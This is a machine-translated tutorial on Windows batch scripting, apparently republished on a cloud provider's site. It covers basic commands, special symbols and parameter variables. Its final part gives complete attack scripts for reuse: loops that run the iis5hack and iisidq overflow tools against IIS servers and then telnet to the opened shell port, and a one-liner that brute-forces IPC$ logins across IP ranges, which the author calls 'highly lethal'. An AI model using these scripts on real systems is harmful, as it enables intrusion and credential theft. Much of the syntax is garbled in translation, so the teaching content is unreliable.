Batch Learning Guide

Source: Internet
Author: User
Tags echo command echo message eol ranges

Part 1: dedicated commands for Batch Processing

A batch file is a collection of commands in a certain order into an executable text file with the extension bat. These commands are collectively called batch processing commands. Next I will introduce the batch processing commands.
1. Rem
Rem is a comment command which is generally used to add annotations to the program. The content after the command will not be displayed and executed during program execution. Example:
Rem, what you see now is the annotation. This sentence will not be executed. The content explained in subsequent examples will be placed after REM. Please note.

2. Echo
ECHO is a echo command. The main parameters include off and on. Generally, Echo message is used to display a specific message. Example:
Echo off
REM and above indicate that the ECHO is disabled and the executed command is not displayed.
Echo: this is the message.
REM and above indicate that "this is the message" is displayed.
Execution result:
C:/> echo. bat
This is the message.

3. Goto
Goto indicates the jump. In batch processing, you can use ": XXX" to construct a label and then use the Goto: Label to directly execute the command after the label. Example
: Label
Above REM is the label.
Dir C :/
Dir D :/
Goto label
The above program jumps to the label and continues execution.

4. Call
The call command can call another batch during batch processing. After another batch is executed, the original batch processing will continue. Example:
Batch Processing 2. Bat content is as follows:
Echo. This is the content of 2.
Batch Processing 1. Bat content is as follows:
Echo: This is 1.
Call 2.bat
Echo 1 and 2 are displayed completely
The execution result is as follows:
C:/> 1.bat
This is the content of 1.
This is the content of 2.
The content of 1 and 2 is displayed completely.

5. Pause
Pause stops the execution of system commands and displays the following content. Example:
C:/> pause
Press any key to continue...

6. If
If condition judgment statement, the syntax format is as follows:
If [not] errorlevel number command
If [not] string1 = string2 command
If [not] exist filename command
Note:
[Not] returns the reverse value of the returned result, that is, "If not.
Errorlevel is the exit value returned after the command is executed.
The number of the exit value ranges from 0 ~ 255. The order of values should be large to small. When the returned value is greater than or equal to the specified value, the condition is true.
String1 = string2 string1 and string2 are both character data. The case sensitivity of English characters is different. The equal sign in this condition must be two (absolutely equal) characters ), execute the command
Exist filename indicates the existence of a file or directory.
The IF errorlevel statement must be placed after a command. After the command is executed, if errorlevel is used to determine the return value of the command.
Example:
1. If [not] errorlevel number command
Checks the return value after the command is executed.
Echo off
Dir Z:
If the exit code is 1 (unsuccessful), Rem jumps to Title 1 for execution.
If errorlevel 1 GOTO 1
If the exit code is 0 (successful), Rem jumps to the title 0 for execution.
If errorlevel 0 goto 0
: 0
Echo Command executed successfully!
After the REM program is executed, jump to the title exit and exit.
Goto exit
: 1
Echo command execution failed!
After the REM program is executed, jump to the title exit and exit.
Goto exit
: Exit
Rem is the exit of the program.
2. If string1 = string2 command
Checks the value of the current variable to make a judgment.
Echo off
If % 1 = 2 goto No
Echo variables are equal!
Goto exit
: No
Echo variables are not equal
Goto exit
: Exit
You can see the effect as follows: C:/> test. Bat number

3. If [not] exist filename command
Identify specific files to make judgments
Echo off
If not exist autoexec. Bat GOTO 1
ECHO file exists successfully!
Goto exit
: 1
Failed to exist ECHO file!
Goto exit
: Exit
This batch processing can be performed on disk C and disk D to see the effect.
7.
The for command is a special command to execute the command cyclically. At the same time, the for command can also be used in the loop. In this article, we will introduce the basic usage and will not apply the loop. We will explain the apply loop later. The for command in batch processing is as follows:
For [% C] In (SET) do [command] [arguments]
The command in the command line is as follows:
For [% C] In (SET) do [command] [arguments]
Common parameters:
/L this set indicates a sequence of numbers starting from the beginning to the end in incremental form. Therefore, (, 5) will generate a sequence 1 2 3 4 5, (5,-) will generate a sequence (5 4 3 2 1 ).
/D if the set contains wildcards, it is specified to match the directory name instead of the file name.

/F read data from the specified file as a variable
EOL = C-refers to the end of a line comment character (just one)
Skip = N-indicates the number of rows ignored at the beginning of the file.
Delims = xxx-refers to the delimiter set. This replaces the default delimiter set of spaces and the hop key.
Tokens = x, y, M-n-indicates which symbol of each row is passed to the for itself of each iteration. This leads to the allocation of additional variable names. The M-N format is a range. Use the nth symbol to specify MTH. If the last character asterisk in the symbol string is used, the additional variable is allocated and the reserved Text of the row is accepted after the last symbol is parsed.
Usebackq-specify that the new syntax is used in the following situations: execute a character string enclosed in quotation marks as a command and use single quotation marks as a text string command, and enameset allows you to use double quotation marks to expand the file name.
Here is an example:
For/F "EOL =; tokens = 2, 3 * delims =," % I in (myfile.txt) Do @ echo % I % J % K
Analyzes each row in myfile.txt, ignores the rows whose names start with semicolons, and passes the second and third symbols in each row to the for program body. Use commas and/or spaces to define the delimiter. Note that the for program body statement references % I to get the second symbol, and references % J to get the third symbol, reference % K to get all the remaining symbols after the third symbol. For file names with spaces, you must enclose them in double quotation marks. To use double quotation marks in this way, you also need to use the usebackq option. Otherwise, double quotation marks are interpreted as defining a string to be analyzed.
% I is specifically described in the for statement. % J and % K are specifically described through the tokens = option. You can use tokens = to specify a maximum of 26 characters in a row. If you do not try to illustrate a variable higher than the letter 'Z' or 'Z. Remember that for variable names are case-sensitive and common. Moreover, no more than 52 variables are in use.
You can also use for/F to analyze the logic on adjacent strings. The method is to enclose the filenameset between parentheses with single quotation marks. In this way, the string is treated as a single input line in a file. Finally, you can use the for/F command to analyze the command output. The method is to convert the filenameset between parentheses into an anti-string. This string will be passed to a sub-cmd. EXE as a command line, and its output will be captured into the memory and analyzed as a file. Therefore, the following example:
For/F "usebackq delims =" % I in ('set') Do @ echo % I
The names of environment variables in the current environment are enumerated.
The following is a simple example to illustrate the difference between/L and no parameter:
Delete the 1.txt 2.txt 3.txt 4.txt 5.txt File
Example:
Echo off
For/L % F in (1, 1, 5) Do del % F. txt
Or
For % F in (1, 2, 3, 4, 5) Do del % F. txt
The execution results of the preceding two commands are the same as follows:
C:/> Del 1.txt
C:/> Del 2.txt
C:/> Del 3.txt
C:/> Del 4.txt
C:/> Del 5.txt

8. setlocal
Start localization of Environment Changes in the batch file. After setlocal is executed
The environment changes are limited to batch files. To restore the original settings, you must execute
Row endlocal. When the end of a batch file is reached
If the setlocal command is not executed, an implicit endlocal is
Run. Example:
@ Echo off
Set path/* view the environment variable path
Pause
Setlocal
Set Path = E:/tools/* reset the environment variable path
Set path
Pause
Endlocal
Set path
From the above example, we can see that the environment variable path is the default path of the system when it is displayed 1st times. E:/tools is displayed as E:/tools. However, when endlocal is used, we can see that it is restored to the default path of the system. However, this setting only works when the batch processing is running. After the batch processing is completed, the environment variable path will be restored.

9. Shift
The shift command allows more than 10 commands on the command to be used (% 0 ~ % 9) Examples of the above replaceable parameters:
Echo off
Echo % 1% 2% 3% 4% 5% 6% 7% 9
Shift
Echo % 1% 2% 3% 4% 5% 6% 7% 9
Shift
Echo % 1% 2% 3% 4% 5% 6% 7% 9
The execution result is as follows:
C:/> shift. Bat 1 2 3 4 5 6 7 8 9 10 11
1 2 3 4 5 6 7 8 9
2 3 4 5 6 7 8 9 10
3 4 5 6 7 8 9 10 11
The above are nine batch processing commands Based on win2000.

Part 2: special symbols and Batch Processing

Some symbols in the command line are not allowed, but some symbols have special meanings.
1. symbol (@)
@ In batch processing, the echo of the current row is disabled. We know from the above that the echo off command can be used to turn off the echo of the entire batch processing command, but the echo off command cannot be displayed. Now we add @ before this command so that the echo off command will be shut down by @ ECHO so that all commands will not be returned.
2. symbol (>)
> Indicates passing and overwriting. The function is to pass the echo result after running to the following range (the file is also the default system console). For example:
The content of file 1.txt is:
1 + 1
Run the command C:/> dir *. txt> 1.txt.
The contents of the 1.txt file are as follows:
The volume in drive C is not labeled.
The serial number of the volume is 301a-1508.
C:/directory
1,005 frunlog. txt
18,598,494 log.txt
5 1.txt
0 aierrorlog.txt
30,571 202.108.txt
18,630,070 bytes for five files
0 directories, 1,191,542,784 available bytes
> Overwrite the original file content with the command execution result.
When passed to the console, the program will not have any echo (Note: echo here is not the same as echo off. Echo off is the echo of the input command. The echo here is the echo of the program execution or after) Example:
C:/> dir *. txt> NUL
The program will have no display and no trace.
3. symbol (>)
The role of symbol> is similar to that of symbol>, but the difference between them is> transfer and append at the end of the File> You can also pass the echo to the console (usage is the same as above). Example:
File 1.txt is the same:
1 + 1
Run the command C:/> dir *. txt> 1.txt.
The contents of the 1.txt file are as follows:
1 + 1
The volume in drive C is not labeled.
The serial number of the volume is 301a-1508.
C:/directory
1,005 frunlog. txt
18,598,494 log.txt
5 1.txt
0 aierrorlog.txt
30,571 202.108.txt
18,630,070 bytes for five files
0 directories, 1,191,542,784 available bytes
> Overwrite the command execution result after the original file content.
4. symbol (|)
| A pipeline transmission command means to pass the result of the previous command execution to the next command for processing. Example:
C:/> dir C:/| find "1508"
The serial number of the volume is 301a-1508.
The preceding command is used to search for all C:/and find 1508 strings. Use Find /? View by yourself
When the format parameter is not used, I used this method to automatically format the disk.
Echo y | fornat A:/S/Q/V: System
Anyone who has used the format Command knows that the format has an interactive conversion process. The user needs to input y to determine whether the current command is executed. Add echo Y to the command and use the pipeline transport character | pass echo execution result y to format to achieve manual input of Y (this command is harmful, please be careful when testing)
5. symbol (^)
^ Is the leading character of special symbols>, <, &, and. In the command, he removes the special kinetic energy of the above three symbols. Just think of them as symbols instead of their special meanings. Example:
C:/> echo test ^> 1.txt
Test> 1.txt
From the examples, we can see that testtestis not written into the file 1.txt, but test> 1.txt is displayed as a string. This symbol is very effective in remote batch building.
6. Symbols (&)
The & symbol allows more than two different commands to be used in one line. If the First Command fails to be executed, the execution of the 2nd commands will not be affected. Example:
C:/> dir Z:/& dir Y:/& dir C :/
The preceding command will consecutively display the Z: Y: C: Content in the drive, regardless of whether the drive letter exists.
7. Symbols (&&)
The & Symbol also allows more than two different commands to be used in one line. When the first command fails to be executed, subsequent commands will not be executed. Example:
C:/> dir Z:/& dir Y:/& dir C :/
The preceding command will prompt you to check whether the disk exists. If the disk exists, run the command. If the disk does not exist, stop executing all subsequent commands.
8. symbol ("")
The "" symbol can contain spaces in a string. You can use the following method to enter a special directory:
C:/> Cd "Program Files"
C:/> Cd progra ~ 1
C:/> Cd Pro *
All of the above methods can go to the Program Files directory.
9. symbol (,)
The symbol is equivalent to a space. In some special cases, it can be used instead of spaces. Example:
C:/> Dir, C :/
10. symbol (;)
The symbols can be used to separate different targets when the commands are the same, but the execution effect remains unchanged. If an error occurs during execution, only the error report is returned, but the program continues to execute. Example:
Dir C:/; D:/; E:/F :/
The preceding command is equivalent
Dir C :/
Dir D :/
Dir E :/
Dir F :/
Of course, there are still some special symbols, but their use range is very small and I will not explain them here one by one.

Part 3: Batch Processing and variable

Appropriate variable references in batch processing will make your program more widely applied. The number of variables that can be processed by batch processing ranges from % 0 ~ % 9: 10 in total. % 0 is used by default for batch file names. % 0 can be replaced by % 1 unless shift command is used. For example, if you add % 0 before % 1, the result is as follows:
C:/> shift. Bat 1 2 3 4 5 6 7 8 9 10 11
Shift. Bat 1 2 3 4 5 6 7 8 9
1 2 3 4 5 6 7 8 9 10
2 3 4 5 6 7 8 9 10 11
How does the system differentiate each variable? The rules for distinguishing variables are spaces in the middle of a string, that is, if space is found, the character before the space is treated as a variable, and the character after the space is used as another variable. If your variable is a long directory name that contains spaces, You Need To enclose it with the quotation marks in the previous special symbol 8. Example:
Batch Processing content:
Echo % 1
Echo % 2
Echo % 3
Enter the following command:
C:/> test "Program Files" Program Files
Program Files
Program
Files
In a complex batch processing, more than 10 variables may be used at the same time, which will conflict with the system rules. How can this problem be solved? There is also an environment variable in the system (you can use the set command to view the environment variables of the current system), such as the current system directory is % WINDIR % or % SystemRoot %. When more than 10 parameters are used at the same time, we can save some variables to be called in subsequent programs as environment variables. The specific usage is as follows: Set A = % 1. In this way, we name a new environment variable A. When we call variable A, we need to call it by % A %. The environment variable is not affected by the shift command. To change an environment variable, you must set it again. Of course, you can also transfer between variables to achieve the goal. Let's take an example. The batch processing is as follows:
Echo off
Set pass = % 1
Shift
Set pass1 = % 1
Shift
Echo % pass % pass1 % 1% 2% 3% 4% 5% 6% 7% 8% 9
Shift
Echo % pass % pass1 % 9
Set pass = % pass1 % variable Transfer
Set pass1 = % 9
Shift
Echo % pass % pass1 % 9
Run the command: C:/> test a B 3 4 5 6 7 8 9 10 K L
A B 3 4 5 6 7 8 9 10 k Note: This line shows 11 variables
A B L after three shifts are used, % 9 is changed to L
Result After B L variable Transfer

Part 4: complete cases

The above are some batch processing usage. Now let's take a closer look at the Batch Processing Methods released on the Internet to see how they work. Here I will list three examples for detailed analysis. To keep the program complete, my comments will be added after.
Example 1
This example uses iis5hack.exe to batch handle overflow of hosts with. Printer vulnerabilities. Iis5hack.exeand telnet.exe are used. Iis5hack command format:
Iis5hack <target IP address> <target port> <target version> <overflow connection port> the 10 numbers with the target version 0-9 correspond to the system versions of different languages and sp respectively, the command format used for batch processing is <IIS. bat target IP (Start version number)> Start version number is optional. The program is as follows.
@ Echo off/* close command echo
If "% 1%" = "" Goto help/* determines whether % 1 is null and % 1 is the target IP
If "% 2%" = "1" GOTO 1/* determines whether % 2 is 1. If it is 1, the jump flag 1
If "% 2%" = "2" Goto 2/* % 2 is the start version.
If "% 2%" = "3" Goto 3/* If yes, the execution starts from the matched place.
If "% 2%" = "4" Goto 4
If "% 2%" = "5" Goto 5
If "% 2%" = "6" Goto 6
If "% 2%" = "7" Goto 7
If "% 2%" = "8" Goto 8
If not exist iis5hack.exe goto file/* if no iis5hack.exe is found, the file segment of the flag is executed.
Ping % 1-N 1 | find "sent Ed = 1"/* ping the target once. The result shows that the sent Ed = 1.
If errorlevel 1 goto error/* If the returned code is 1, execute the error segment (Code 1 indicates that no 0 is found, and the error segment is successfully executed)
Iis5hack % 1 80 9 88 | find "good"/* start to overflow the target port 80 System Code 9 after the overflow, the connection port 88 finds the string "good" in the execution result (only after the overflow is successful there will be a string of good)
If not errorlevel 1 goto Telnet/* if there is no error code 1 (overflow successful), execute the content of the Telnet segment.
Echo operating system type 9 failed! /Otherwise, this sentence is displayed.
: 8/* the following code content can be found above
Iis5hack % 1 80 8 88 | find "good"
If not errorlevel 1 goto Telnet
Echo operating system type 8 failed!
: 7
Iis5hack % 1 80 7 88 | find "good"
If not errorlevel 1 goto Telnet
Echo operating system type 7 failed!
: 6
Iis5hack % 1 80 6 88 | find "good"
If not errorlevel 1 goto Telnet
Echo operating system type 6 failed!
: 5
Iis5hack % 1 80 5 88 | find "good"
If not errorlevel 1 goto Telnet
Echo operating system type 5 failed!
: 4
Iis5hack % 1 80 4 88 | find "good"
If not errorlevel 1 goto Telnet
Echo operating system type 4 failed!
: 3
Iis5hack % 1 80 3 88 | find "good"
If not errorlevel 1 goto Telnet
Echo operating system type 3 failed!
: 2
Iis5hack % 1 80 2 88 | find "good"
If not errorlevel 1 goto Telnet
Echo operating system type 2 failed!
: 1
Iis5hack % 1 80 1 88 | find "good"
If not errorlevel 1 goto Telnet
Echo operating system type 1 failed!
: 0
Iis5hack % 1 80 0 88 | find "good"
If not errorlevel 1 goto Telnet
Echo operating system type 0 failed!
Goto Error
: Telnet
Telnet % 1 88/* start to connect to port 88 of the target IP Address
Goto exit/* jump to the exit segment after the connection is interrupted
: Error/* the error section displays the help information after the error.
Echo may be unable to connect to the network or the other party to fix this vulnerability! Please try it manually in the following format!
Echo iis5hack [target IP address] [Web port] [system type] [open port]
Echo Chinese: 0
Echo Chinese + SP1: 1
Echo English: 2
Echo English + SP1: 3
Echo Japanese: 4
Echo Japanese + SP1: 5
Echo Korean: 6
Echo Korean + SP1: 7
Echo in Mexico: 8
Echo Mexican + SP1: 9
Goto exit/* jump to exit
: File/* the file segment shows no information found in the file.
ECHO file iis5hack.exe not found! The program stops running!
Goto exit/* jump to exit
: Help/* help section shows the help format of the batch processing
Echo:
Echo IIS [target IP address]
Echo IIS [target IP address] [Starting number 9-0]
: Exit/* exit is the program exit
There is basically no loop in this batch processing. So the code is not difficult!
Example 2
In this example, iisidq.exe is used to batch process instances with idq vulnerabilities. Iisidq.exeand telnet.exe are used. Iisidq.exe is used as follows:
Running parameters: operating system type Destination Address Web port 1 Overflow listening port <enter command 1>
If no command parameter is input, the default value is "cmd.exe ".
The Code Range of the operating system type is 0-14. The command format used for batch processing is <idq. Bat target IP address> as follows:
@ Echo off/* same example 1
If not exist iisidq.exe goto file/* same example 1
If % 1 = "" Goto error/* same example 1
Ping % 1-N 1 | find "received = 1"/* same example 1
If errorlevel 1 goto error1/* same example 1
Set B = % 1/* Create an environment variable B and pass the content of the variable % 1 to environment variable B. The content of variable B will be the target IP address later
Set a = 0/* Create an environment variable A and specify the environment variable A as 0. Because the entire batch processing cycle is used, a is used as the counter.
: No/* start with no
If % A % = 0 set D = 0/* If environment variable a = 0, create environment variable D and set environment variable D = 0.
If % A % = 1 set D = 1/* Environment Variable D is actually the operating system type code, and it is controlled by counters.
If % A % = 2 set D = 2/* changes.
If % A % = 3 set D = 3
If % A % = 4 set D = 4
If % A % = 5 set D = 5
If % A % = 6 set D = 6
If % A % = 7 set D = 7
If % A % = 9 set D = 9
If % A % = 10 set D = 13
If % A % = 11 set D = 14
Goto 0/* after the variable is passed, go to sign 0 to run
: 1
ECHO is executing item % d %! Cannot connect to target % B %! Attempting to connect... please wait ......
: 0/* Indicates 0 to start
Iisidq % d % B % 80 1 99 | find "good"/* Send the overflow command in the format and find the string "good" in the result (the string "good" is displayed only when the code is successfully sent)
If errorlevel 1 GOTO 1/* if there is no good string, no jump is sent
/* Try again at mark 1
Ping 127.0.0.1-N 8> NUL/* Ping yourself 8 times, which is equivalent to a delay of 8 seconds without executing
/* Row result
ECHO is executing item % d %! /* Type of Operating System Reporting Overflow
Telnet % B % 99/* connection overflow Port
Echo./* display a blank line
If % d % = 14 goto error1/* If the operating system type is 14, jump to error1 (loop Exit)
If % d % = 13 set a = 11/* start to reattach the value to the operating system code with the counter
If % d % = 9 set a = 10
If % d % = 7 set a = 9
If % d % = 6 set a = 7
If % d % = 5 set a = 6
If % d % = 4 set a = 5
If % d % = 3 set a = 4
If % d % = 2 set a = 3
If % d % = 1 set a = 2
If % d % = 0 set a = 1
Goto no/* Add a value to complete the no-segment jump execution
: File/* the following are the help prompts after an error
Echo iisidq.exe not found! Put this file in the same directory as this file!
Goto exit
: Error
Echo error! The target IP address cannot be identified! Use the following format to connect!
Echo idq [target IP address]
Goto exit
: Error1
Echo connection failed! This vulnerability or network fault may have been fixed on the target machine!
Please try echo in the following format!
Echo iisidq [target type] [target IP address] [target port] [connection mode] [overflow port]
Echo Telnet [target IP address] [overflow port]
: Exit/* exit of the entire program
This batch processing adopts the overall cycle to master the counter and then master the batch processing.
Example 3
For/L % A in (255, 255) do for/L % B in (254,) do for/L % C in) do for/F "tokens = 1, 2 *" % E in (userpass.txt) Do net use // % 1. %. % B. % C/IPC $ % E/u: % F
The preceding command is one. We can see that this command uses four for to apply. Usage: C:/> test. the first character in bat 218 contains the second character of the password % E as the username % F and finally executes the command (here I include all the above values, set the password to 123 and the user name to ABC)
Net USR // 218.0.0.1/IPC $123/u: ABC
Of course, some of the above examples may be too simple and inflexible. I have made some modifications to this example (for the complete file, see the CD IPC. BAT). You can check it by yourself if you are interested. The modified program can flexibly search for the range from start to end or from start to maximum IP address. Of course, the function can be enhanced. It's up to you to see if you can become a new tool.
This loop is a little bigger, mainly because it is difficult to replace the numbers of IP addresses. I will not write comments for this batch processing. Please refer to the above content and you will soon understand this batch processing. Do not make it easy to understand! At least this is a batch process that can detect and save weak passwords without any third-party tools !! A simple change is still highly lethal. The biggest advantage of all the above batch processing tests passed in Win2000 and XP is that there is only one batch processing file and there is no false alarm. The disadvantage is that it is too long!

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.